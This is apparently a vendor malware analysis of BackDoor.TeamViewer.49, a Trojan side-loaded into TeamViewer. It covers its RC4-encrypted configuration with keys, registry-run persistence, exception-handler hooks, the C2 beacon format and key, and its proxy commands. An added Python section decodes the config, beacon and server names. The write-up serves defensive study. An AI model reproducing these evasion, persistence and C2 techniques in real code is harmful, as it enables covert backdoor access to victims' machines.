SHA1:
- 9649ef7b594794daaf02da08c3b95a9f2f71149b (avicap32.dll)
- 4884d44e2b4c2e2a65472068ef748f51385b13de (payload)
A Trojan for Microsoft Windows that is spread by Trojan.MulDrop6.39120. The Trojan's main payload is incorporated into the avicap32.dll library. Trojan.MulDrop6.39120 runs TeamViewer, which automatically loads the library into the computer's memory. All strings, imports, and functions of TeamViewer's process are actively implemented by this malicious library. The most critical parts of the Trojan's code are encoded with base64 and encrypted with RC4.
When running, the Trojan removes the TeamViewer icon from the Windows notification area and disables error reporting. BackDoor.TeamViewer.49 also intercepts calls to some system functions to hide the TeamViewer window.
The Trojan reads the value of the HKLM\Software\Microsoft\Cryptography\MachineGUID registry parameter and calculates its MD5 hash. The result is used both as the RC4 key and as the name of the mutex that prevents the Trojan from being started twice. In addition, the backdoor generates a global RC4 key using one of the TeamViewer functions.
BackDoor.TeamViewer.49 uses a configuration file named nv8moxflu, located in the same directory as the Trojan itself. The first byte of the configuration file is a flag that specifies which key is used: if the byte equals 1, the global key is used; if it is 0, the local one. The rest of the file is encrypted with RC4. The configuration file of the examined sample looks as follows:
Section {Main}
szsubKey "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
szvalueName "5s"
szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"
szadminkey "i9igmhtliih115b5xlbpcwwc17qlbhse4"
SectionEnd
To decrypt the other code blocks, the backdoor uses the MD5 hash of the "szadminkey" parameter value. It then parses the "Main" section of the configuration file, retrieves all parameters, and replaces the original file with a copy encrypted with the local key.
The Trojan launches a separate thread that, in an infinite loop with a fixed delay between iterations, sets the "hidden" and "system" attributes on the folder containing its executable file, the malicious library, and the configuration file. If it fails to set these attributes, the Trojan starts removing all the TeamViewer keys from the system registry:
HKCU\Software\TeamViewer\Version6\MachineFallback
HKCU\Software\TeamViewer\Version6
HKCU\Software\TeamViewer
The backdoor registers itself in autorun by intercepting calls to the hookRegOpenKeyExW function.
Then it installs a Vectored Exception Handler and sets breakpoints (0xCC) at the address 0x5A7A84 and at the MessageBoxW function.
To handle the exception codes 0xC0000005 (STATUS_ACCESS_VIOLATION), 0xC0000374 (STATUS_HEAP_CORRUPTION), and 0x80000004 (STATUS_SINGLE_STEP), the following code is executed:
ContextRecord->SegDs = 35;        // restore the user-mode data segment selector (0x23)
ContextRecord->EFlags |= 0x100u;  // set the Trap Flag so the next instruction raises STATUS_SINGLE_STEP
return EXCEPTION_CONTINUE_EXECUTION;
To handle 0x80000003 (STATUS_BREAKPOINT), the Trojan first checks the address at which the exception occurred. If the address is 0x5A7A84, a hook is placed on the call that TeamViewer makes to WinVerifyTrust (a dynamically obtained import). The hook always returns "1", which means "the signature is invalid". The Trojan also checks whether the exception address coincides with the address of the MessageBoxW function. If it does, the backdoor replaces the value of the EIP register with the address of its LoadEmbLib function and quits the exception handler.
The Trojan's body contains one more encrypted library, responsible for the malicious activity. It is written in C++ using the boost library. The additional library is decrypted with RC4 using a key obtained from the szpgkey parameter of the configuration file, and is then loaded into memory.
This library contains a specially generated array of server names. The names are stored byte by byte, each byte XORed with 0x18.
When trying to connect, the backdoor uses the following User-Agent:
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
The following line is generated:
client_id=%.8x&connected=0&server_port=0&debug=0
where client_id is the serial number of the hard drive containing the C: volume, XORed with the SID.
This line is encrypted with RC4 using the "heyfg645fdhwi" key and is then hex-encoded (bintohex). After that, the line is sent to the server in the following request:
http://<cnc>/analytics.php?c=<encoded_data>
The server's reply is likewise RC4-encrypted and hex-encoded.
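The following decoding helpers are an added example for analysts and are not Dr.Web's code or part of the sample. They cover the three encodings described above: the configuration file (key flag byte followed by RC4 data, local key derived from the MD5 of MachineGuid), the beacon parameter sent to analytics.php (RC4 with the "heyfg645fdhwi" key, then hex), and the XOR-0x18 server names. The MachineGuid value and the encrypted blob are constructed here; the assumption that the local key is the raw MD5 digest of the GUID string, and that bintohex is plain hex encoding, are labelled in the comments.

```python
"""Decoding helpers for BackDoor.TeamViewer.49 artifacts (added example, not Dr.Web's code)."""
import hashlib
from typing import Dict, Optional


def rc4(key: bytes, data: bytes) -> bytes:
    # Textbook RC4 (KSA + PRGA). Encryption and decryption are the same operation.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def local_key(machine_guid: str) -> bytes:
    # The local RC4 key is the MD5 of the MachineGuid registry value.
    # ASSUMPTION: the raw ASCII bytes of the GUID string are hashed and the
    # 16-byte digest is used directly as the key.
    return hashlib.md5(machine_guid.encode("ascii")).digest()


def decrypt_config(blob: bytes, local: bytes, global_key: Optional[bytes] = None) -> str:
    # First byte selects the key: 1 = global key, 0 = local key; everything after it is RC4 data.
    flag = blob[0]
    if flag == 0:
        key = local
    elif flag == 1:
        if global_key is None:
            raise ValueError("config uses the global key, which must be recovered from the sample")
        key = global_key
    else:
        raise ValueError("unknown key flag %d" % flag)
    return rc4(key, blob[1:]).decode("ascii")


def parse_main_section(text: str) -> Dict[str, str]:
    # Collect `name "value"` pairs between 'Section {Main}' and 'SectionEnd'.
    params: Dict[str, str] = {}
    inside = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Section {Main}":
            inside = True
        elif line == "SectionEnd":
            inside = False
        elif inside and " " in line:
            name, value = line.split(" ", 1)
            params[name] = value.strip().strip('"')
    return params


BEACON_KEY = b"heyfg645fdhwi"  # static key from the analysis above


def encode_beacon(plain: str) -> str:
    # Value of the c= parameter: hex(RC4(key, line)). ASSUMPTION: bintohex is plain hex.
    return rc4(BEACON_KEY, plain.encode("ascii")).hex()


def decode_beacon(encoded: str) -> str:
    # Inverse of encode_beacon; the server reply uses the same scheme.
    return rc4(BEACON_KEY, bytes.fromhex(encoded)).decode("ascii")


def xor_server_name(blob: bytes) -> str:
    # Server names are stored byte-wise, each byte XORed with 0x18.
    return bytes(b ^ 0x18 for b in blob).decode("ascii")


# Constructed sample: the config text quoted on this page, encrypted with a made-up MachineGuid.
SAMPLE_GUID = "12345678-abcd-ef01-2345-6789abcdef01"  # constructed, not from a real host
SAMPLE_CONFIG = (
    "Section {Main}\n"
    'szsubKey "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"\n'
    'szvalueName "5s"\n'
    'szpgkey "rtpredimpku0hrq1le0d4cwqw7pcl97dv"\n'
    'szadminkey "i9igmhtliih115b5xlbpcwwc17qlbhse4"\n'
    "SectionEnd\n"
)


def build_sample_blob(flag: int = 0) -> bytes:
    # Produce an nv8moxflu-style file body using the local key (flag 0).
    return bytes([flag]) + rc4(local_key(SAMPLE_GUID), SAMPLE_CONFIG.encode("ascii"))


if __name__ == "__main__":
    blob = build_sample_blob()
    cfg = parse_main_section(decrypt_config(blob, local_key(SAMPLE_GUID)))
    print("persistence:", cfg["szsubKey"], "->", cfg["szvalueName"])
    beacon = encode_beacon("client_id=0a1b2c3d&connected=0&server_port=0&debug=0")
    print("c=", beacon)
    print("decoded:", decode_beacon(beacon))
```

On a real file, read nv8moxflu as bytes, take the MachineGuid value from the infected host's registry, and pass both to decrypt_config; a ValueError on flag 1 means the file was re-encrypted with the TeamViewer-derived global key, which has to be recovered from the running sample rather than from the registry.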
The Trojan can execute the following commands received over HTTPS:
- disconnect—terminate the connection;
- idle—maintain the connection;
- updips—update the auth_ip list with the one specified in the command received;
- connect—connect to the specified host server. The command must consist of the following parameters:
- ip—host server’s IP address;
- auth_swith—use authorization. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
- auth_ip—IP authentication;
- auth_login—login;
- auth_pass—password.
Other network activity is implemented with boost::asio::stream_socket_service and uses a binary protocol.
The Trojan can execute the following commands received over the binary protocol:
- Authentication—depending on the auth_swith parameter, the Trojan sends either data on the auth_ip parameter or auth_login and auth_pass.
- Keep-Alive (0x01)—maintains the connection to the server.
- Send Data (0x02)—searches the Trojan's body for the signature C8 1F 0E 8D 4A 97 06 2A BC B8 3A D0 30 92 2E 59 and sends the number of bytes specified by the server.
- Proxy (0x00)—redirects traffic from the C&C server to the remote host server specified by the server.